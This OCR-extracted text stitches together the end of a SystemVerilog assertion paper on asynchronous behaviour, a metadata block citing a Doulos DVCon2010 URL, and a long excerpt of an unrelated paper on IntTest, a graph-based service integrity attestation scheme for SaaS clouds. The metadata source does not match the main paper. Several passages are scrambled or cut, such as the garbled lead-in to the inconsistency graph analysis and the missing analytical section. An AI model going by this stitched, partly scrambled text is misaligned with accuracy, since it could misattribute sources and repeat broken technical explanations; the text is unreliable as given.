- **Guideline 5:** For timing simulations, synchronously checking the design’s behavior upon the asynchronous event is probably the best overall solution.
The second class of asynchronous behaviors is communication between modules. The sender and receiver both operate synchronously, but since they do not pass a clock the communication becomes asynchronous and either the information...
must be sampled synchronously or with a handshaking scheme. Checking asynchronously communication can be treated as nothing more than a SVA multi-clocked sequence. SystemVerilog has well-defined semantics for clock handover and clock flow through a sequence so the difficulty lies in synchronizing between the two clock domains. With proper clock handover, writing sequences to check asynchronous communication is a straightforward task. Handling asynchronous communication can be summarized using the following guidelines:
- **Guideline 6**: Clock domain crossing is handled using $\Rightarrow$ or $\#\#1$ for clock handover.
- **Guideline 7**: An asynchronous interface can be handled using clock handover in the same way as clock domain crossing.
Coverage can also be measured using these techniques. While not discussed in this paper, the same assertion properties can be used by cover property and the same asynchronous behaviors recorded. By following these simple guidelines, most—if not all—kinds of asynchronous behaviors can be properly handled, increasing overall verification confidence.
5. ACKNOWLEDGEMENTS
I would like to thank and acknowledge the excellent engineers at Doulos who have developed the SystemVerilog and SVA training courses. In particular, I have borrowed diagrams from the SV scheduling and multi-clock assertion materials.
Many thanks to my former colleague, Jonathan Bromley (Verilabs), who has provided incredible insights and invaluable comments in reviewing this paper. As always, Jonathan has an incredible depth of knowledge and understanding of SystemVerilog, and challenges me to research my ideas to much greater depths.
Also, many thanks to Matt Homiller (Sun Microsystems) for his review and comments of this paper, and special thanks to Scott Little and John Havlicek (Freescale) for their many helpful comments and corrections.
6. REFERENCES
|
{"Source-Url": "https://www.doulos.com/knowhow/sysverilog/DVCon10_sva_paper/DVCon2010_AsyncSVA_paper.pdf", "len_cl100k_base": 11076, "olmocr-version": "0.1.50", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 44961, "total-output-tokens": 12147, "length": "2e13", "weborganizer": {"__label__adult": 0.0007176399230957031, "__label__art_design": 0.001125335693359375, "__label__crime_law": 0.0005583763122558594, "__label__education_jobs": 0.001346588134765625, "__label__entertainment": 0.00018799304962158203, "__label__fashion_beauty": 0.00039005279541015625, "__label__finance_business": 0.0004825592041015625, "__label__food_dining": 0.0005335807800292969, "__label__games": 0.0015459060668945312, "__label__hardware": 0.09027099609375, "__label__health": 0.0006327629089355469, "__label__history": 0.0006213188171386719, "__label__home_hobbies": 0.00043845176696777344, "__label__industrial": 0.0037078857421875, "__label__literature": 0.00031638145446777344, "__label__politics": 0.0005464553833007812, "__label__religion": 0.0010404586791992188, "__label__science_tech": 0.35693359375, "__label__social_life": 9.399652481079102e-05, "__label__software": 0.0123138427734375, "__label__software_dev": 0.5234375, "__label__sports_fitness": 0.0005960464477539062, "__label__transportation": 0.0017404556274414062, "__label__travel": 0.00028824806213378906}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51905, 0.01932]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51905, 0.7189]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51905, 0.89609]], "google_gemma-3-12b-it_contains_pii": [[0, 4319, false], [4319, 7773, null], [7773, 11533, null], [11533, 16844, null], [16844, 21498, null], [21498, 25465, null], [25465, 30690, null], [30690, 35027, null], [35027, 39345, null], [39345, 42889, null], [42889, 49001, null], [49001, 51905, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4319, true], [4319, 7773, null], [7773, 11533, null], [11533, 16844, null], [16844, 21498, null], [21498, 25465, null], [25465, 30690, null], [30690, 35027, null], [35027, 39345, null], [39345, 42889, null], [42889, 49001, null], [49001, 51905, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51905, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51905, null]], "pdf_page_numbers": [[0, 4319, 1], [4319, 7773, 2], [7773, 11533, 3], [11533, 16844, 4], [16844, 21498, 5], [21498, 25465, 6], [25465, 30690, 7], [30690, 35027, 8], [35027, 39345, 9], [39345, 42889, 10], [42889, 49001, 11], [49001, 51905, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51905, 0.03146]]}
|
olmocr_science_pdfs
|
2024-11-29
|
2024-11-29
|
d3175a66ef96df5aad9c54ffb7f9435f3c715232
|
Scalable Distributed Service Integrity Attestation for Software-as-a-Service Clouds
Juan Du, Member, IEEE, Daniel J. Dean, Student Member, IEEE, Yongmin Tan, Member, IEEE, Xiaohui Gu, Senior Member, IEEE, Ting Yu, Member, IEEE
Abstract—Software-as-a-Service (SaaS) cloud systems enable application service providers to deliver their applications via massive cloud computing infrastructures. However, due to their sharing nature, SaaS clouds are vulnerable to malicious attacks. In this paper, we present IntTest, a scalable and effective service integrity attestation framework for SaaS clouds. IntTest provides a novel integrated attestation graph analysis scheme that can provide stronger attacker pinpointing power than previous schemes. Moreover, IntTest can automatically enhance result quality by replacing bad results produced by malicious attackers with good results produced by benign service providers. We have implemented a prototype of the IntTest system and tested it on a production cloud computing infrastructure using IBM System S stream processing applications. Our experimental results show that IntTest can achieve higher attacker pinpointing accuracy than existing approaches. IntTest does not require any special hardware or secure kernel support and imposes little performance impact to the application, which makes it practical for large-scale cloud systems.
Index Terms—Distributed Service Integrity Attestation, Cloud Computing, Secure Distributed Data Processing
1 INTRODUCTION
Cloud computing has emerged as a cost-effective resource leasing paradigm, which obviates the need for users maintain complex physical computing infrastructures by themselves. Software-as-a-Service (SaaS) clouds (e.g., Amazon Web Service [1], Google AppEngine [2]) builds upon the concepts of Software as a Service (SaaS) [3] and Service Oriented Architecture (SOA) [4], [5], which enable application service providers (ASPs) to deliver their applications via the massive cloud computing infrastructure. In particular, our work focuses on data stream processing services [6]–[8] that are considered to be one class of killer applications for clouds with many real world applications in security surveillance, scientific computing, and business intelligence.
However, cloud computing infrastructures are often shared by ASPs from different security domains, which make them vulnerable to malicious attacks [9], [10]. For example, attackers can pretend to be legitimate service providers to provide fake service components and the service components provided by benign service providers may include security holes that can be exploited by attackers. Our work focuses on service integrity attacks that cause the user to receive untruthful data processing results, illustrated by Figure 1. Although confidentiality and privacy protection problems have been extensively studied by previous research [11]–[16], the service integrity attestation problem has not been properly addressed. Moreover, service integrity is the most prevalent problem, which needs to be addressed no matter whether public or private data are processed by the cloud system.
Although previous work has provided various software integrity attestation solutions [9], [17]–[19], [19]–[23], those techniques often require special trusted hardware or secure kernel support, which makes them difficult to be deployed on large-scale cloud computing infrastructures. Traditional Byzantine fault tolerance (BFT) techniques [24], [25] can detect arbitrary misbehaviors using full time majority voting over all replicas, which however incur high overhead to the cloud system. A detailed discussion of the related work can be found in section 5 of the online supplementary material.
In this paper, we present IntTest, a new integrated service integrity attestation framework for multi-tenant cloud systems. IntTest provides a practical service integrity attestation scheme that does not assume trusted entities on third-party service provisioning sites or require ap-
plication modifications. IntTest builds upon our previous work RunTest [26] and AdapTest [27] but can provide stronger malicious attacker pinpointing power than RunTest and AdapTest. Specifically, both RunText and AdapTest as well as traditional majority voting schemes need to assume that benign service providers take majority in every service function. However, in large-scale multi-tenant cloud systems, multiple malicious attackers may launch colluding attacks on certain targeted service functions to invalidate the assumption. To address the challenge, IntTest takes a holistic approach by systematically examining both consistency and inconsistency relationships among different service providers within the entire cloud system. IntTest examines both per-function consistency graphs and the global inconsistency graph. The per-function consistency graph analysis can limit the scope of damage caused by colluding attackers while the global inconsistency graph analysis can effectively expose those attackers that try to compromise many service functions. Hence, IntTest can still pinpoint malicious attackers even if they become majority for some service functions.
By taking an integrated approach, IntTest can not only pinpoint attackers more efficiently but also can suppress aggressive attackers and limit the scope of the damage caused by colluding attacks. Moreover, IntTest provides result auto-correction that can automatically replace corrupted data processing results produced by malicious attackers with good results produced by benign service providers. Specifically, this paper makes the following contributions:
- We provide a scalable and efficient distributed service integrity attestation framework for large-scale cloud computing infrastructures.
- We present a novel integrated service integrity attestation scheme that can achieve higher pinpointing accuracy than previous techniques.
- We describe a result auto-correction technique that can automatically correct the corrupted results produced by malicious attackers.
- We conduct both analytical study and experimental evaluation to quantify the accuracy and overhead of the integrated service integrity attestation scheme.
We have implemented a prototype of the IntTest system and tested it on NCSU’s virtual computing lab (VCL) [28], a production cloud computing infrastructure that operates in a similar way as the Amazon elastic compute cloud (EC2) [29]. The benchmark applications we use to evaluate IntTest are distributed data stream processing services provided by the IBM System S stream processing platform [8], [30], an industry strength data stream processing system. Experimental results show that IntTest can achieve more accurate pinpointing than existing schemes (e.g. RunTest, AdapTest, full time majority voting) under strategically colluding attacks. IntTest is scalable, and can reduce the attestation overhead by more than one order of magnitude compared to the traditional full time majority voting scheme.
The rest of the paper is organized as follows. Section 2 presents our system model. Section 3 presents the design details. Section 4 provides an analytical study about the IntTest system. Section 5 presents the experimental results. Section 6 summarises the limitations of our approach. Finally, the paper concludes in Section 7.
2 Preliminary
In this section, we first introduce the software-as-a-service (SaaS) cloud system model. We then describe our problem formulation including the service integrity attack model and our key assumptions. Table 1 summarizes all the notations used in this paper.
2.1 SaaS Cloud System Model
SaaS cloud builds upon the concepts of Software as a Service (SaaS) [3] and Service Oriented Architecture (SOA) [4], [5], which allows application service providers (ASPs) to deliver their applications via large-scale cloud computing infrastructures. For example, both Amazon Web Service (AWS) and Google AppEngine provide a set of application services supporting enterprise applications and big data processing. A distributed application service can be dynamically composed from individual service components provided by different ASPs ($p_i$) [31], [32]. For example, a disaster assistance claim processing application [33] consists of voice-over-IP (VoIP) analysis component, email analysis component, community discovery component, clustering and join components. Our work focuses on data processing services [6], [8], [34], [35] which have become increasingly popular with applications in many real world usage domains such as business intelligence, security surveillance, and scientific computing.
Each service component, denoted by $c_i$, provides a specific data processing function, denoted by $f_i$, such as sorting, filtering, correlation, or data mining utilities. Each service component can have one or more input ports for receiving input data tuples, denoted by $d_i$, and one or more output ports to emit output tuples.
<table>
<thead>
<tr>
<th>notation</th>
<th>meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>$p_i$</td>
<td>service provider</td>
</tr>
<tr>
<td>$f_i$</td>
<td>service function</td>
</tr>
<tr>
<td>$c_i$</td>
<td>service component</td>
</tr>
<tr>
<td>$d_i$</td>
<td>application data tuple</td>
</tr>
<tr>
<td>$P_u$</td>
<td>attestation probability</td>
</tr>
<tr>
<td>$r$</td>
<td>number of copies for a tuple</td>
</tr>
<tr>
<td>$K$</td>
<td>Max number of malicious service providers</td>
</tr>
<tr>
<td>$G_G$</td>
<td>minimum vertex cover of graph $G$</td>
</tr>
<tr>
<td>$N_p$</td>
<td>the neighbor set of node $p$</td>
</tr>
<tr>
<td>$G_p$</td>
<td>the residual graph of $G$</td>
</tr>
<tr>
<td>$\Omega$</td>
<td>the set of malicious service providers identified by the global inconsistency graph</td>
</tr>
<tr>
<td>$M_i$</td>
<td>the set of malicious service providers identified by consistency graph in service function $f_i$</td>
</tr>
</tbody>
</table>
**TABLE 1**
Notations.
In a large-scale SaaS cloud, the same service function can be provided by different ASPs. Those functionally-equivalent service components exist because: i) service providers may create replicated service components for load balancing and fault tolerance purposes; and ii) popular services may attract different service providers for profit. To support automatic service composition, we can deploy a set of portal nodes [31], [32] that serve as the gateway for the user to access the composed services in the SaaS cloud. The portal node can aggregate different service components into composite services based on the user’s requirements. For security protection, the portal node can perform authentication on users to prevent malicious users from disturbing normal service provisioning.
Different from other open distributed systems such as peer-to-peer networks and volunteer computing environments, SaaS cloud systems possess a set of unique features. First, third-party ASPs typically do not want to reveal the internal implementation details of their software services for intellectual property protection. Thus, it is difficult to only rely on challenge-based attestation schemes [20], [36], [37] where the verifier is assumed to have certain knowledge about the software implementation or have access to the software source code. Second, both the cloud infrastructure provider and third-party service providers are autonomous entities. It is impractical to impose any special hardware or secure kernel support on individual service provisioning sites. Third, for privacy protection, only portal nodes have global information about which service functions are provided by which service providers in the SaaS cloud. Neither cloud users nor individual ASPs have the global knowledge about the SaaS cloud such as the number of ASPs and the identifiers of the ASPs offering a specific service function.
### 2.2 Problem Formulation
Given an SaaS cloud system, the goal of IntTest is to pinpoint any malicious service provider that offers an untruthful service function. IntTest treats all service components as black-boxes, which does not require any special hardware or secure kernel support on the cloud platform. We now describe our attack model and our key assumptions as follows.
**Attack model.** A malicious attacker can pretend to be a legitimate service provider or take control of vulnerable service providers to provide untruthful service functions. Malicious attackers can be stealthy, which means they can misbehave on a selective subset of input data or service functions while pretending to be benign service providers on other input data or functions. The stealthy behavior makes detection more challenging due to the following reasons: 1) the detection scheme needs to be hidden from the attackers to prevent attackers from gaining knowledge on the set of data processing results that will be verified and therefore easily escaping detection; 2) the detection scheme needs to be scalable while being able to capture misbehavior that may be both unpredictable and occasional.
In a large-scale cloud system, we need to consider colluding attack scenarios where multiple malicious attackers collude or multiple service sites are simultaneously compromised and controlled by a single malicious attacker. Attackers could sporadically collude, which means an attacker can collude with an arbitrary subset of colluders at any time. We assume that malicious nodes have no knowledge of other nodes except those they interact with directly. However, attackers can communicate with their colluders in an arbitrary way. Attackers can also change their attacking and colluding strategies arbitrarily.
**Assumptions.** We first assume that the total number of malicious service components is less than the total number of benign ones in the entire cloud system. Without this assumption, it would be very hard, if not totally impossible, for any attack detection scheme to work when comparable ground truth processing results are not available. However, different from RunTest, AdapTest, or any previous majority voting schemes, IntTest does not assume benign service components have to be the majority for every service function, which will greatly enhance our pinpointing power and limit the scope of service functions that can be compromised by malicious attackers.
Second, we assume that the data processing services are input-deterministic, that is, given the same input, a benign service component always produces the same or similar output (based on a user defined similarity function). Many data stream processing functions fall into this category [8]. We can also easily extend our attestation framework to support stateful data processing services [38], which however is outside the scope of this paper.
Third, we also assume that the result inconsistency caused by hardware or software faults can be marked by fault detection schemes [39] and are excluded from our malicious attack detection.
### 3 Design and Algorithms
In this section, we first present the basis of the IntTest system: probabilistic replay-based consistency check and the integrity attestation graph model. We then describe the integrated service integrity attestation scheme in detail. Next, we present the result auto-correction scheme.
#### 3.1 Baseline Attestation Scheme
In order to detect service integrity attack and pinpoint malicious service providers, our algorithm relies on *replay-based consistency check* to derive the
consistency/inconsistency relationships between service providers. For example, Figure 2 shows the consistency check scheme for attesting three service providers $p_1$, $p_2$, and $p_3$ that offer the same service function $f$. The portal sends the original input data $d_1$ to $p_1$ and gets back the result $f(d_1)$. Next, the portal sends $d_1'$, a duplicate of $d_1$ to $p_3$ and gets back the result $f(d_1')$. The portal then compares $f(d_1)$ and $f(d_1')$ to see whether $p_1$ and $p_3$ are consistent.
The intuition behind our approach is that if two service providers disagree with each other on the processing result of the same input, at least one of them should be malicious. Note that we do not send an input data item and its duplicates (i.e., attestation data) concurrently. Instead, we replay the attestation data on different service providers after receiving the processing result of the original data. Thus, the malicious attackers cannot avoid the risk of being detected when they produce false results on the original data. Although the replay scheme may cause delay in a single tuple processing, we can overlap the attestation and normal processing of consecutive tuples in the data stream to hide the attestation delay from the user.
If two service providers always give consistent output results on all input data, there exists consistency relationship between them. Otherwise, if they give different outputs on at least one input data, there is inconsistency relationship between them. We do not limit the consistency relationship to equality function since two benign service providers may produce similar but not exactly the same results. For example, the credit scores for the same person may vary by a small difference when obtained from different credit bureaus. We allow the user to define a distance function to quantify the biggest tolerable result difference.
Definition 1: For two output results, $r_1$ and $r_2$, which come from two functionally equivalent service providers respectively, Result Consistency is defined as either $r_1 = r_2$, or the distance between $r_1$ and $r_2$ according to user-defined distance function $D(r_1, r_2)$ falls within a threshold $\delta$.
For scalability, we propose randomized probabilistic attestation, an attestation technique that randomly replays a subset of input data for attestation. For composite dataflow processing services consisting of multiple service hops, each service hop is composed of a set of functionally equivalent service providers. Specifically, for an incoming tuple $d_i$, the portal may decide to perform integrity attestation with probability $p_u$. If the portal decides to perform attestation on $d_i$, the portal first sends $d_i$ to a predefined service path $p_1 \rightarrow p_2 \ldots \rightarrow p_l$ providing functions $f_1 \rightarrow f_2 \ldots \rightarrow f_l$. After receiving the processing result for $d_i$, the portal replays the duplicate(s) of $d_i$ on alternative service path(s) such as $p_1' \rightarrow p_2' \ldots \rightarrow p_l'$, where $p_j'$ provides the same function $f_j$ as $p_j$. The portal may perform data replay on multiple service providers to perform concurrent attestation.
After receiving the attestation results, the portal compares each intermediate result between pairs of functionally equivalent service providers $p_i$ and $p_i'$. If $p_i$ and $p_i'$ receive the same input data but produce different output results, we say that $p_i$ and $p_i'$ are inconsistent. Otherwise, we say that $p_i$ and $p_i'$ are consistent with regard to function $f_j$. For example, let us consider two different credit score service providers $p_1$ and $p_1'$. Suppose the distance function is defined as two credit score difference is no more than 10. If $p_1$ outputs 500 and $p_1'$ outputs 505 for the same person, we say $p_1$ and $p_1'$ are consistent. However, if $p_1$ outputs 500 and $p_1'$ outputs 550 for the same person, we would consider $p_1$ and $p_1'$ to be inconsistent. We evaluate both intermediate and final data processing results between functionally equivalent service providers to derive the consistency/inconsistency relationships. For example, if data processing involves a sub-query to a database, we evaluate both the final data processing result along with the intermediate sub-query result. Note that although we do not attest all service providers at the same time, all service providers will be covered by the randomized probabilistic attestation over a period of time.
With replay-based consistency check, we can test functionally equivalent service providers and obtain their consistency and inconsistency relationships. We employ both the consistency graph and inconsistency graph to aggregate pair-wise attestation results for further analysis. The graphs reflect the consistency/inconsistency relationships across multiple service providers over a period of time. Before introducing the attestation graphs, we first define consistency links and inconsistency links.
Definition 2: A consistency link exists between two service providers who always give consistent output for the same input data during attestation. An inconsistency link exists between two service providers who give at least one inconsistent output for the same input data during attestation.
We then construct consistency graphs for each function to capture consistency relationships among the service providers provisioning the same function. Figure 3(a) shows the consistency graphs for two functions. Note that two service providers that are consistent for one function are not necessarily consistent for another function. This is the reason why we confine consistency graphs within individual functions.
Definition 3: A per-function consistency graph is an undirected graph, with all the attested service providers that provide the same service function as the vertices and consistency links as the edges.
We use a global inconsistency graph to capture inconsistency relationships among all service providers. Two service providers are said to be inconsistent as long as they disagree in any function. Thus, we can derive more comprehensive inconsistency relationships by integrating inconsistency links across functions. Figure 3(b) shows an example of the global inconsistency graph. Note that service provider $p_5$ provides both functions $f_1$ and $f_2$. In the inconsistency graph, there is a single node $p_5$ with its links reflecting inconsistency relationships in both functions.
For example, in Figure 3(a),
we assume that the number of benign service providers is always kept consistent with each other, benign service providers. The consistency links in per-function consistency graphs can tell which set of service providers keep consistent with each other on a specific service function. For any service function, since benign service providers and they always form a consistency clique. Thus, it is insufficient to examine the per-function consistency graph only. We need to integrate the consistency graph analysis with the inconsistency graph analysis to achieve more robust integrity attestation.
Step 2: Inconsistency graph analysis. Given an inconsistency graph containing only the inconsistency links, there may exist different possible combinations of the benign node set and the malicious node set. However, if we assume that the total number of malicious service providers in the whole system is no more than $K$, we can pinpoint a subset of truly malicious service providers. Intuitively, given two service providers connected by an inconsistency link, we can say that at least one of them is malicious since any two benign service providers should always agree with each other. Thus, we can derive the lower bound about the number of malicious service providers by examining the minimum vertex cover of the inconsistency graph. The minimum vertex cover of a graph is a minimum set of vertices such that each edge of the graph is incident to at least one vertex in the set. For example, in Figure 3(b), $p_2$ and $p_5$ form the minimum vertex cover. We present two propositions as part of our approach. The proofs for these propositions can be found in section 1 of the online supplementary material.
Proposition 1: Given an inconsistency graph $G$, let $C_G$ be a minimum vertex cover of $G$. Then the number of malicious service providers is no less than $|C_G|$.
We now define the residual inconsistency graph for a node $p_i$ as follows.
Definition 5: The residual inconsistency graph of node $p_i$ is the inconsistency graph after removing the node $p_i$ and all of links adjacent to $p_i$.
For example, Figure 4 shows the residual inconsistency graph after removing the node $p_2$. Based on the lower bound of the number of malicious service providers and Definition 5, we have the following proposition for pinpointing a subset of malicious nodes.
Proposition 2: Given an integrated inconsistency graph $G$ and the upper bound of the number of malicious service providers $K$, a node $p$ must be a malicious service provider if and only if
$$|N_p| + |C_{G_p}| > K$$ (1)
where $|N_p|$ is the neighbor size of $p$, and $|C_{G'_p}|$ is the size of the minimum vertex cover of the residual inconsistency graph after removing $p$ and its neighbors from $G$.
For example, in Figure 3(b), suppose we know the number of malicious service providers is no more than 2. Let us examine the malicious node $p_2$ first. After we remove $p_2$ and its neighbors $p_1$, $p_3$, and $p_4$ from the inconsistency graph, the residual inconsistency graph will be a graph without any link. Thus, its minimum vertex cover is 0. Since $p_2$ has three neighbors, we have $3 + 0 > 2$. Thus, $p_2$ is malicious. Let us now check out the benign node $p_1$. After removing $p_1$ and its two neighbors $p_2$ and $p_5$, the residual inconsistency graph will be a graph without any link and its minimum vertex cover should be 0. Since $p_1$ has two neighbors, Equation 1 does not hold. We will not pinpoint $p_1$ as malicious in this step.
Note that benign service providers that do not serve same functions with malicious ones will be isolated nodes in the inconsistency graph, since they will not be involved in any inconsistency links. For example, in Figure 5, nodes $p_4$, $p_5$, $p_6$ and $p_7$ are isolated nodes since they are not associated with any inconsistency links in the global inconsistency graph. Thus, we can remove these nodes from the inconsistency graph without affecting the computation of the minimum vertex cover.
We now describe how to estimate the upper bound of the number of malicious service providers $K$. Let $N$ denote the total number of service providers in the system. Since we assume that the total number of malicious service providers is less than that of benign ones, the number of malicious service providers should be no more than $\lfloor N/2 \rfloor$. According proposition 1, the number of malicious service providers should be no less than the size of the minimum vertex cover $|C_G|$ of the global inconsistency graph. Thus, $K$ is first bounded by its lower bound $|C_G|$ and upper bound $\lfloor N/2 \rfloor$. We then use an iterative algorithm to tighten the bound of $K$. We start from the lower bound of $K$, and compute the set of malicious nodes, as described by Proposition 2, denoted by $\Omega$. Then we gradually increase $K$ by one each time. For each specific value of $K$, we can get a set of malicious nodes. With a larger $K$, the number of nodes that can satisfy $|N_x|+|C_{G'_x}| > K$ becomes less, which causes the set $\Omega$ to be reduced. When $\Omega = \emptyset$, we stop increasing $K$, since any larger $K$ cannot give more malicious nodes. Intuitively, when $K$ is large, fewer nodes may satisfy Equation 1. Thus, we may only identify a small subset of malicious nodes. In contrast, when $K$ is small, more nodes may satisfy Equation 1, which may mistakenly pinpoint benign nodes as malicious. To avoid false positives, we want to pick a large enough $K$, which can pinpoint a set of true malicious service providers.
**Step 3: Combining consistency and inconsistency graph analysis results.** Let $G_1$ be the consistency graph generated for service function $f_i$, and $G$ be the global inconsistency graph. Let $M_i$ denote the list of suspicious nodes by analyzing per function consistency graph $G_i$ (i.e., nodes belonging to minority cliques), and $\Omega$ denotes the list of suspicious nodes by analyzing the global inconsistency graph $G$, given a particular upper bound of the number of malicious nodes $K$. We examine per-function consistency graphs one by one. Let $\Omega_i$ denote the subset of $\Omega$ that serves function $f_i$. If $\Omega_i \cap M_i \neq \emptyset$, we add nodes in $M_i$ to the identified malicious node set. The idea is that since the majority of nodes serving function $f_i$ have successfully excluded malicious nodes in $\Omega_i$, we could trust their decision on proposing $M_i$ as malicious nodes. Pseudo-code of our algorithm can be found in section 1 of the online supplemental material.
For example, Figure 6 shows both the per-function consistency graphs and the global inconsistency graph. If the upper bound of the malicious nodes $K$ is set to 4, the inconsistency graph analysis will capture the malicious node $p_8$ but will miss the malicious node $p_9$. The reason is that $p_8$ only has three neighbors and the minimum vertex cover for the residual inconsistency graph after removing $p_8$ and its three neighbors is 1. Note that we will not pinpoint any benign node as malicious according to Proposition 2. For example, the benign node $p_1$ has two neighbors and the minimum vertex cover for the residual graph after removing $p_1$ and its two neighbors $p_8$ and $p_9$ will be 0 since the residual graph does not include any link. However, by checking the consistency graph of function $f_1$, we find $\Omega_1 = \{p_9\}$ has overlap with the minority clique $M_1 = \{p_8, p_9\}$. We then infer $p_9$ should be malicious too.
Note that even if we have an accurate estimation of the number of malicious nodes, the inconsistency graph analysis scheme may not identify all malicious nodes. However, our integrated algorithm can pinpoint more malicious nodes than the inconsistency graph only algorithm. An example
3.3 Result Auto-Correction
IntTest can not only pinpoint malicious service providers but also automatically correct corrupted data processing results to improve the result quality of the cloud data processing service, illustrated by Figure 7. Without our attestation scheme, once an original data item is manipulated by any malicious node, the processing result of this data item can be corrupted, which will result in degraded result quality. IntTest leverages the attestation data and the malicious node pinpointing results to detect and correct compromised data processing results.
Specifically, after the portal node receives the result $f(d)$ of the original data $d$, the portal node checks whether the data $d$ has been processed by any malicious node that has been pinpointed by our algorithm. We label the result $f(d)$ as “suspicious result” if $d$ has been processed by any pinpointed malicious node. Next, the portal node checks whether $d$ has been chosen for attestation. If $d$ is selected for attestation, we check whether the attestation copy of $d$ only traverses good nodes. If it is true, we will use the result of the attestation data to replace $f(d)$. For example, in Figure 7, the original data $d$ is processed by the pinpointed malicious node $s_6$ while one of its attestation data $d''$ is only processed by benign nodes. The portal node will use the attestation data result $f(d'')$ to replace the original result that can be corrupted if $s_6$ cheated on $d$.
Although our algorithm cannot guarantee zero false positives when there are multiple independent colluding groups, it will be difficult for attackers to escape our detection with multiple independent colluding groups since attackers will have inconsistency links not only with benign nodes but also with other groups of malicious nodes. Additionally, our approach limits the damage colluding attackers can cause if they can evade detection in two ways. First, our algorithm limits the number of functions which can be simultaneously attacked. Second, our approach ensures a single attacker cannot participate in compromising an unlimited number of service functions without being detected.
5 EXPERIMENTAL EVALUATION
In this section, we present the experimental evaluation of the IntTest system. We first describe our experimental setup. We then present and analyze the experimental results.
5.1 Experiment Setup
We have implemented a prototype of the IntTest system and tested it using the NCSU’s virtual computing lab (VCL) [28], a production cloud infrastructure operating in a similar way as Amazon EC2 [29]. We add portal nodes into VCL and deploy IBM System S stream processing middleware [8], [30] to provide distributed data stream processing service. System S is an industry-strength high performance stream processing platform that can analyze massive volumes of continuous data streams and scale to hundreds of processing elements (PEs) for each application. In our experiments, we used 10 VCL nodes which run 64bit CentOS 5.2. Each node runs multiple virtual machines (VMs) on top of Xen 3.0.3.
The dataflow processing application we use in our experiments is adapted from the sample applications provided by System S. This application takes stock information as input, performs windowed aggregation on the input stream according to the specified company name and then performs calculations on the stock data. We use a trusted portal node to accept the input stream, perform comprehensive integrity attestation on the PEs and analyze the attestation results. The portal node constructs one consistency graph for each service function and one global inconsistency graph across all service providers in the system.
For comparison, we have also implemented three alternative integrity attestation schemes: 1) the Full-Time Majority Voting (FTMV) scheme, which employs all functionally-equivalent service providers at all time for attestation and determines malicious service providers through majority voting on the processing results; 2) the Part-Time Majority Voting (PTMV) scheme, which employs all functionally-equivalent service providers over a subset of input data for attestation and determines malicious service providers using majority voting; and 3) the RunTest scheme [26], which pinpoints malicious service providers by analyzing only per-function consistency graphs, labeling those service providers that are outside of all cliques of size larger than $\lfloor k/2 \rfloor$ as malicious, where $k$ is the number of service providers.
providers that take participate in this service function. Note that AdapTest [27] uses the same attacker pinpointing algorithm as RunTest. Thus, AdapTest has the same detection accuracy as RunTest but with less attestation overhead.
Three major metrics for evaluating our scheme are detection rate, false alarm rate, and attestation overhead. We calculate the detection rate, denoted by $AD$, as the number of pinpointed malicious service providers over the total number of malicious service providers that have misbehaved at least once during the experiment. During runtime, the detection rate should start from zero and increase as more malicious service providers are detected. False alarm rate $AF$ is defined as $N_{fp}/(N_{fp} + N_{tn})$, where $N_{fp}$ denotes false alarms corresponding to the number of benign service providers that are incorrectly identified as malicious; $N_{tn}$ denotes true negatives corresponding to the number of benign service providers that are correctly identified as benign. The attestation overhead is evaluated by both the number of duplicated data tuples that are redundantly processed for service integrity attestation and the extra dataflow processing time incurred by the integrity attestation.
We assume that the colluding attackers know our attestation scheme and take the best strategy while evaluating the IntTest system. According to the security analysis in Section 4, in order to escape detection, the best practice for attackers is to attack as a colluding group. Colluding attackers can take different strategies. They may conservatively attack by first attacking those service functions with less number of service providers where they can easily take majority, assuming they know the number of participating service providers for each service function. Alternatively, they may aggressively attack by attacking service functions randomly, assuming they do not know the number of participating service providers. We investigate the impact of these attack strategies on our scheme in terms of both detection rate and false alarm rate.
### 5.2 Results and Analysis
We first investigate the accuracy of our scheme in pinpointing malicious service providers. Figure 8(a) compares our scheme with the other alternative schemes (i.e., FTMV, PTMV, RunTest) when malicious service providers aggressively attack different number of service functions. In this set of experiments, we have 10 service functions and 30 service providers. The number of service providers in each service function randomly ranges in [1,8]. Each benign service provider provides two randomly selected service functions. The data rate of the input stream is 300 tuples per second. We set 20% of service providers as malicious. After the portal receives the processing result of a new data tuple, it randomly decides whether to perform data attestation. Each tuple has 0.2 probability of getting attested (i.e., attestation probability $P_{u} = 0.2$), and two attestation data replicas are used (i.e., number of total data copies including the original data $r = 3$). Each experiment is repeated three times. We report the average detection rate and false alarm rate achieved by different schemes. Note that RunTest can achieve the same detection accuracy results as the majority voting based schemes after the randomized probabilistic attestation covers all attested service providers and discovers the majority clique [26]. In contrast, IntTest comprehensively examines both per-function consistency graphs and the global inconsistency graph to make the final pinpointing decision. We observe that IntTest can achieve much higher detection rate and lower false alarm rate than other alternatives. Moreover, IntTest can achieve better detection accuracy when malicious service providers attack more functions. We also observe that when malicious service providers attack aggressively, our scheme can detect them even though they attack a low percentage of service functions.
